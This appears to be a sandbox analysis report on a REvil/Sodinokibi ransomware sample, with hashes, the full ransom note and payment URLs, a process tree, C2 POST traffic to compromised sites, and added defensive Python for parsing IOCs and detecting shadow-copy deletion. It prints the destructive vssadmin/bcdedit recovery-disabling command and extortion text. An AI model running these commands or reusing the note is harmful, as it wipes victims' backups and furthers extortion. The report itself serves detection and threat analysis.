Analysis

  • max time kernel
    140s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20240802-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    06/09/2024, 17:40 UTC

General

  • Target

    d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe

  • Size

    179KB

  • MD5

    d0190f94e6d05104977c53b55dbc2911

  • SHA1

    c0ff002b0e26b180a741c3cefff15190df7746cc

  • SHA256

    f4e5d7a95681d920dda75fe5dd89be249905e2a7712f9b3b39e19351f5ef5e69

  • SHA512

    d4b1cc032f9d8254ac6035c27948147d8c4c5f60be51e632ba26c6e34ada87515b3113b4bd1cec3cedfa1a73c465a1267681ca05356d8f2f08d81c4fef04d868

  • SSDEEP

    3072:LNKQ4JTBg0Q8F63VETed7/kBazzFbULpC15RM:LNn4FQS63VE6F/M4qE15

Malware Config

Extracted

Path

C:\Users\7m7n045-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 7m7n045.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!
  a) Download and install TOR browser from this site: https://torproject.org/
  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/557D3C3EC7AB7055

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
  b) Open our secondary website: http://decryptor.top/557D3C3EC7AB7055

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key:

dA7pdvKB7426yxzvojf3NOgs/72fzWmvRPGm4fy0PDnuvo9Cx69uWtHdrojiJf7V
Dj1tG0aDo+pjlaRrNiISnDLHHXHgvw7oWh3Adn0CIRSCk9YcP/Brru+h+0xmPy48
IzYWZz5WUKZZQSOLNCKyNM/2RXIkoluB8IjmThjwhuOpU3GlhkPe4IrenoWrqT9S
kI7kJESWH3BqDWnxfpWvkyUpGUZlV/kD7MJHedoqNa2QpoqP8sCDRamto0L3KRN1
GHoWNFAPjfLKoF4f/oktlGAFUJS2DcS5BqQjc12sVSdOJqdj83cmZDRG/eaBFe6+
/eVlSfcK4dovSX9gAvFmqlJnuD/bJVJy2mmABrk6phStKRo6OhsVkB7WlVypMZqb
Ii5RyNt2akW5Zv9hWVJ8fcm3/JD+XhXj560Q/Lz2+WTsXcl1XLi5AwGjz7mEz0++
dXGuDpkE2N8eOVCRA6n5ifRcQDQVMbaLa+2sMsWC6N4pMqFFcVB8ZNzTzCaupaSK
l9KFXJrgHl4J9my2gR5Asv0YGkJhAG8rr26kUABl80aAj0sUh1SQlIFEQfrnMpP5
/N5BZPhxKtlabyw0oJQsx3uTvptW4yVz6or1OUh0ziKpne1lU7VXjI/IdRu2XEfz
V+RFDQjQuew6tUGaQSap25QiVEUzsgt4LcZhPThpdMKeIrZlVSvbv7vOGKRgpITv
WmpG4PDQZnLpQCpW7eZv4rX07dtmgfNeIxohGzcadUfjI3bFuDcZj+BKWtrKIC8b
P0GZfWqjXcNf68IwMaEca/Fjnpjj2xncnqOxN7iHONsv70T7nmS3WKPwFAk3aDWr
tFPKHYR8kn815f3L/0qRvaml+cVXKAn5ZsNKLXv8Y7dXaPAsT0agRogaT3AtkWgh
Dsw69xVnOQjDUTiHKgnLHWvVyZWTPKXs0hgqIO+DtVJ77KSTvY7ynmIGhWekCZ83
4IeNV/fbSshUU3xG4J7nS9HD6/6yGehdXRcBXIQzx2a8MAYCSnBLPv//FSanwCMO
K+O6Lw6huEUS7Zqp03wBUSySN+NCRFa8Nmq6tLET1zLmvmoeMCYPfPNuftV9VtAZ
PQVMn7vaPdTXHJL0uG27UiTmx1Xu0Ffz+4GB91dYyuJN4BYdlcHJ+L2yuBB586RO
+hYXcqGdQqzNNVULF1YUIVqNcdadv8sUz60eKDCMPSUvqt9SwGj4aViVl2V2XiQk
SfTcNM5Vuv2tq8wA7Su/Vg==

Extension name: 7m7n045

-----------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/557D3C3EC7AB7055

http://decryptor.top/557D3C3EC7AB7055
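
The note above carries three things worth pulling out automatically on every new sample: the victim id appended to both payment URLs, the per-victim extension (which also names the dropped note, C:\Users\7m7n045-readme.txt) and the base64 "Key" blob the victim is told to paste into the portal. The Python below is an added example for this page, not part of the tria.ge report or of the malware; it assumes the layout of the note shown above (a "Key:" block followed by an "Extension name:" line) and uses an abbreviated inline copy of that note as constructed input.

```python
import base64
import re
from dataclasses import dataclass

# Constructed sample: the 7m7n045-readme.txt note from this report with the prose
# paragraphs cut down. URLs, the Key block and the Extension line are verbatim.
SAMPLE_NOTE = """---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 7m7n045.
[+] How to get access on website? [+]
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/557D3C3EC7AB7055
b) Open our secondary website: http://decryptor.top/557D3C3EC7AB7055
When you open our website, put the following data in the input form:
Key:

dA7pdvKB7426yxzvojf3NOgs/72fzWmvRPGm4fy0PDnuvo9Cx69uWtHdrojiJf7V
Dj1tG0aDo+pjlaRrNiISnDLHHXHgvw7oWh3Adn0CIRSCk9YcP/Brru+h+0xmPy48
IzYWZz5WUKZZQSOLNCKyNM/2RXIkoluB8IjmThjwhuOpU3GlhkPe4IrenoWrqT9S
kI7kJESWH3BqDWnxfpWvkyUpGUZlV/kD7MJHedoqNa2QpoqP8sCDRamto0L3KRN1
GHoWNFAPjfLKoF4f/oktlGAFUJS2DcS5BqQjc12sVSdOJqdj83cmZDRG/eaBFe6+
/eVlSfcK4dovSX9gAvFmqlJnuD/bJVJy2mmABrk6phStKRo6OhsVkB7WlVypMZqb
Ii5RyNt2akW5Zv9hWVJ8fcm3/JD+XhXj560Q/Lz2+WTsXcl1XLi5AwGjz7mEz0++
dXGuDpkE2N8eOVCRA6n5ifRcQDQVMbaLa+2sMsWC6N4pMqFFcVB8ZNzTzCaupaSK
l9KFXJrgHl4J9my2gR5Asv0YGkJhAG8rr26kUABl80aAj0sUh1SQlIFEQfrnMpP5
/N5BZPhxKtlabyw0oJQsx3uTvptW4yVz6or1OUh0ziKpne1lU7VXjI/IdRu2XEfz
V+RFDQjQuew6tUGaQSap25QiVEUzsgt4LcZhPThpdMKeIrZlVSvbv7vOGKRgpITv
WmpG4PDQZnLpQCpW7eZv4rX07dtmgfNeIxohGzcadUfjI3bFuDcZj+BKWtrKIC8b
P0GZfWqjXcNf68IwMaEca/Fjnpjj2xncnqOxN7iHONsv70T7nmS3WKPwFAk3aDWr
tFPKHYR8kn815f3L/0qRvaml+cVXKAn5ZsNKLXv8Y7dXaPAsT0agRogaT3AtkWgh
Dsw69xVnOQjDUTiHKgnLHWvVyZWTPKXs0hgqIO+DtVJ77KSTvY7ynmIGhWekCZ83
4IeNV/fbSshUU3xG4J7nS9HD6/6yGehdXRcBXIQzx2a8MAYCSnBLPv//FSanwCMO
K+O6Lw6huEUS7Zqp03wBUSySN+NCRFa8Nmq6tLET1zLmvmoeMCYPfPNuftV9VtAZ
PQVMn7vaPdTXHJL0uG27UiTmx1Xu0Ffz+4GB91dYyuJN4BYdlcHJ+L2yuBB586RO
+hYXcqGdQqzNNVULF1YUIVqNcdadv8sUz60eKDCMPSUvqt9SwGj4aViVl2V2XiQk
SfTcNM5Vuv2tq8wA7Su/Vg==
Extension name: 7m7n045
!!! DANGER !!!
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
VICTIM_ID_RE = re.compile(r"/([0-9A-F]{16})/?$")        # REvil appends the victim id to both payment URLs
EXT_LINE_RE = re.compile(r"^Extension name:[ \t]*(\S+)", re.M)
EXPANSION_RE = re.compile(r"\bexpansion[ \t]+([A-Za-z0-9]+)")
KEY_BLOCK_RE = re.compile(r"Key:\s*(.*?)\s*Extension name:", re.S)


@dataclass(frozen=True)
class RevilNoteIocs:
    victim_id: str        # hex token appended to the payment URLs
    extension: str        # per-victim extension, also the prefix of the note filename
    payment_urls: tuple
    key_b64: str          # the "Key" blob the victim is told to paste into the portal
    key_bytes: int        # its decoded size


def parse_revil_note(text: str, note_path: str = "") -> RevilNoteIocs:
    """Pull the per-victim IOCs out of a Sodinokibi/REvil note and cross-check them."""
    payment_urls, ids = [], set()
    for url in URL_RE.findall(text):
        m = VICTIM_ID_RE.search(url)
        if m:                                   # skips helper links such as torproject.org
            payment_urls.append(url)
            ids.add(m.group(1))
    if len(ids) != 1:
        raise ValueError(f"expected one victim id across payment URLs, got {sorted(ids)}")

    ext_line, hint = EXT_LINE_RE.search(text), EXPANSION_RE.search(text)
    if not ext_line or not hint or ext_line.group(1) != hint.group(1):
        raise ValueError("extension line and 'expansion' hint missing or disagree")
    extension = ext_line.group(1)
    # REvil drops the note as <extension>-readme.txt; anything else deserves a second look.
    if note_path and not note_path.replace("\\", "/").endswith(f"/{extension}-readme.txt"):
        raise ValueError(f"{note_path!r} is not the expected {extension}-readme.txt")

    key_m = KEY_BLOCK_RE.search(text)
    if not key_m:
        raise ValueError("no Key: block between 'Key:' and 'Extension name:'")
    key_b64 = "".join(key_m.group(1).split())            # undo the 64-column line wrapping
    key_raw = base64.b64decode(key_b64, validate=True)   # binascii.Error if the blob was mangled
    return RevilNoteIocs(ids.pop(), extension, tuple(payment_urls), key_b64, len(key_raw))
```

Decoding the key blob gives 928 bytes, which is also the Content-Length of every POST in the Network section below, so the two are worth comparing when a note found on disk has to be tied to captured traffic. The cross-checks (one id across both URLs, the extension line agreeing with the "expansion" hint and with the note filename) reject truncated or hand-edited copies instead of emitting half an IOC set.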

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Drops desktop.ini file(s) 27 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 36 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1480
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3552
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1508
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4396,i,7447299413640964517,4240724842020506306,262144 --variations-seed-version --mojo-platform-channel-handle=1288 /prefetch:8
      1⤵
        PID:4160
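
The second process in the tree is the recovery-inhibiting chain REvil runs before encrypting: vssadmin.exe Delete Shadows /All /Quiet, then bcdedit turning off Windows recovery and boot-failure handling (ATT&CK T1490, Inhibit System Recovery). Note the image path: the child is C:\Windows\SysWOW64\cmd.exe although the command line names System32. That is WOW64 file-system redirection, and it tells you the process that spawned it is 32-bit. The Python below is an added example for this page, not code from tria.ge or from the sample: a small process-creation detector that unwraps the cmd /c chain, matches each sub-command against T1490 patterns and scores the event. The event records are constructed; the two entries mirroring the report's tree use its PIDs, images and command lines, while the parent PID 1000 and the benign control events are made up.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation records. The first two mirror this report's process
# tree (PIDs, image paths and command lines as shown above); the parent PID 1000 of
# the sample and the control events with PIDs 4100/4101 are made up for the example.
SAMPLE_EVENTS = [
    {"pid": 1480, "ppid": 1000,
     "image": r"C:\Users\Admin\AppData\Local\Temp\d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe"'},
    {"pid": 3552, "ppid": 1480,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures'},
    {"pid": 4100, "ppid": 700, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c vssadmin list shadows & bcdedit /enum'},
    {"pid": 4101, "ppid": 700, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic shadowcopy delete"},
]

# T1490 Inhibit System Recovery: each rule is matched against one chained sub-command.
RULES = {
    "vssadmin_delete_shadows":      re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I),
    "wmic_shadowcopy_delete":       re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I),
    "wbadmin_delete_catalog":       re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\b.*\bcatalog\b", re.I),
    "bcdedit_disable_recovery":     re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I),
    "bcdedit_ignore_boot_failures": re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I),
}
CMD_WRAPPER_RE = re.compile(r'^(?:"[^"]*cmd(?:\.exe)?"|\S*cmd(?:\.exe)?)\s+/[ck]\s+(.*)$', re.I)
CHAIN_SPLIT_RE = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")


@dataclass
class Finding:
    pid: int
    ppid: int
    rules: list = field(default_factory=list)
    severity: str = "none"
    wow64_parent: bool = False   # image under SysWOW64 while the command line says System32


def split_chain(cmdline: str) -> list:
    """Strip a `cmd.exe /c` (or /k) wrapper and split the chained sub-commands."""
    m = CMD_WRAPPER_RE.match(cmdline)
    body = m.group(1) if m else cmdline
    return [part for part in CHAIN_SPLIT_RE.split(body) if part]


def evaluate(event: dict) -> Finding:
    f = Finding(event["pid"], event["ppid"])
    for part in split_chain(event["cmdline"]):
        for name, rx in RULES.items():
            if rx.search(part) and name not in f.rules:
                f.rules.append(name)
    if f.rules:
        # One such command is suspicious on its own; shadow deletion chained with
        # recovery tampering in a single cmd line is the ransomware pattern.
        f.severity = "high" if len(f.rules) >= 2 else "medium"
    # WOW64 redirection: a 32-bit parent asking for System32\cmd.exe gets SysWOW64\cmd.exe.
    f.wow64_parent = (event["image"].lower().startswith("c:\\windows\\syswow64\\")
                      and "system32" in event["cmdline"].lower())
    return f


def scan(events) -> list:
    """Return a Finding for every event that matched at least one T1490 rule."""
    return [f for f in map(evaluate, events) if f.rules]
```

Splitting on the chain operators before matching matters: a single regex over the whole line would also fire on benign lines such as `vssadmin list shadows & del somefile`, whereas per-sub-command matching requires `delete` and `shadows` to sit in the same vssadmin invocation. The WOW64 flag is not a detection by itself, but it is a cheap way to note that the launcher is 32-bit, which narrows the candidate parents during triage.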

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dns.google
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dns.google
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        149.220.183.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        149.220.183.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        speiserei-hannover.de
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        speiserei-hannover.de
        IN A
        Response
        speiserei-hannover.de
        IN A
        62.113.229.82
      • flag-de
        POST
        https://speiserei-hannover.de/news/pictures/xdts.gif
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        62.113.229.82:443
        Request
        POST /news/pictures/xdts.gif HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: speiserei-hannover.de
        Response
        HTTP/1.1 404 Not Found
        Date: Fri, 06 Sep 2024 17:41:06 GMT
        Server: Apache
        Content-Length: 196
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
      • flag-us
        DNS
        82.229.113.62.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        82.229.113.62.in-addr.arpa
        IN PTR
        Response
        82.229.113.62.in-addr.arpa
        IN PTR
        srv-a-dec-175.maxcluster.net
      • flag-us
        DNS
        82.229.113.62.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        82.229.113.62.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        delegationhub.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        delegationhub.com
        IN A
        Response
      • flag-us
        DNS
        136.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        136.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        subyard.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        subyard.com
        IN A
        Response
        subyard.com
        IN A
        62.221.214.138
      • flag-nl
        POST
        https://subyard.com/wp-content/pics/kuobnopwoa.gif
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        62.221.214.138:443
        Request
        POST /wp-content/pics/kuobnopwoa.gif HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: subyard.com
        Response
        HTTP/1.1 405 Not Allowed
        Server: openresty
        Date: Fri, 06 Sep 2024 17:41:07 GMT
        Content-Type: text/html
        Content-Length: 154
        Connection: close
        Age: 0
        X-Varnish-Cache: MISS
      • flag-us
        DNS
        martha-frets-ceramics.nl
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        martha-frets-ceramics.nl
        IN A
        Response
        martha-frets-ceramics.nl
        IN A
        185.135.241.6
      • flag-nl
        POST
        https://martha-frets-ceramics.nl/content/image/eomhlxhguw.gif
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        185.135.241.6:443
        Request
        POST /content/image/eomhlxhguw.gif HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: martha-frets-ceramics.nl
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 06 Sep 2024 17:41:08 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        Link: <https://martha-frets-ceramics.nl/wp-json/>; rel="https://api.w.org/"
        Vary: User-Agent
      • flag-us
        DNS
        138.214.221.62.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        138.214.221.62.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        6.241.135.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        6.241.135.185.in-addr.arpa
        IN PTR
        Response
        6.241.135.185.in-addr.arpa
        IN PTR
        server6.hosting2go.nl
      • flag-us
        DNS
        hostastay.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        hostastay.com
        IN A
        Response
        hostastay.com
        IN A
        101.99.77.144
      • flag-us
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        217.106.137.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        217.106.137.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        217.106.137.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        217.106.137.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        217.106.137.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        217.106.137.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        144.77.99.101.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        144.77.99.101.in-addr.arpa
        IN PTR
        Response
        144.77.99.101.in-addr.arpa
        IN PTR
        server1kamonla
      • flag-us
        DNS
        144.77.99.101.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        144.77.99.101.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        206.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        206.23.85.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        206.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        206.23.85.13.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        19.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        19.229.111.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        92.12.20.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        92.12.20.2.in-addr.arpa
        IN PTR
        Response
        92.12.20.2.in-addr.arpa
        IN PTR
        a2-20-12-92.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        81.144.22.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        81.144.22.2.in-addr.arpa
        IN PTR
        Response
        81.144.22.2.in-addr.arpa
        IN PTR
        a2-22-144-81.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        luvbec.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        luvbec.com
        IN A
        Response
        luvbec.com
        IN A
        76.223.67.189
        luvbec.com
        IN A
        13.248.213.45
      • flag-us
        POST
        https://luvbec.com/wp-content/pictures/tbcwfh.jpg
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        76.223.67.189:443
        Request
        POST /wp-content/pictures/tbcwfh.jpg HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: luvbec.com
        Response
        HTTP/1.1 405 Method Not Allowed
        Date: Fri, 06 Sep 2024 17:42:05 GMT
        Content-Length: 0
        Connection: close
      • flag-us
        DNS
        dayenne-styling.nl
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        dayenne-styling.nl
        IN A
        Response
        dayenne-styling.nl
        IN A
        85.10.159.84
      • flag-us
        DNS
        dayenne-styling.nl
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        dayenne-styling.nl
        IN A
      • flag-us
        DNS
        189.67.223.76.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        189.67.223.76.in-addr.arpa
        IN PTR
        Response
        189.67.223.76.in-addr.arpa
        IN PTR
        a67c48129651a0940.awsglobalaccelerator.com
      • flag-nl
        POST
        https://dayenne-styling.nl/include/images/njwqni.png
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        85.10.159.84:443
        Request
        POST /include/images/njwqni.png HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: dayenne-styling.nl
        Response
        HTTP/1.1 500 Internal Server Error
        Server: nginx
        Date: Fri, 06 Sep 2024 17:42:07 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: 46f8f8a5e7e6f47e87e7960b89f7991e=94ae026j5m1d5j70o47ccli6q1; path=/; secure; HttpOnly
        Cache-Control: public
      • flag-us
        DNS
        84.159.10.85.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        84.159.10.85.in-addr.arpa
        IN PTR
        Response
        84.159.10.85.in-addr.arpa
        IN PTR
        85.10.159.84.nl.transip.me
      • flag-us
        DNS
        73.144.22.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        73.144.22.2.in-addr.arpa
        IN PTR
        Response
        73.144.22.2.in-addr.arpa
        IN PTR
        a2-22-144-73.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        111firstdelray.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        111firstdelray.com
        IN A
        Response
        111firstdelray.com
        IN A
        146.148.139.87
      • flag-us
        DNS
        111firstdelray.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        111firstdelray.com
        IN A
      • flag-us
        DNS
        18.173.189.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.173.189.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        18.173.189.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.173.189.20.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        lidkopingsnytt.nu
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        lidkopingsnytt.nu
        IN A
        Response
        lidkopingsnytt.nu
        IN A
        185.189.49.45
      • flag-us
        DNS
        lidkopingsnytt.nu
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
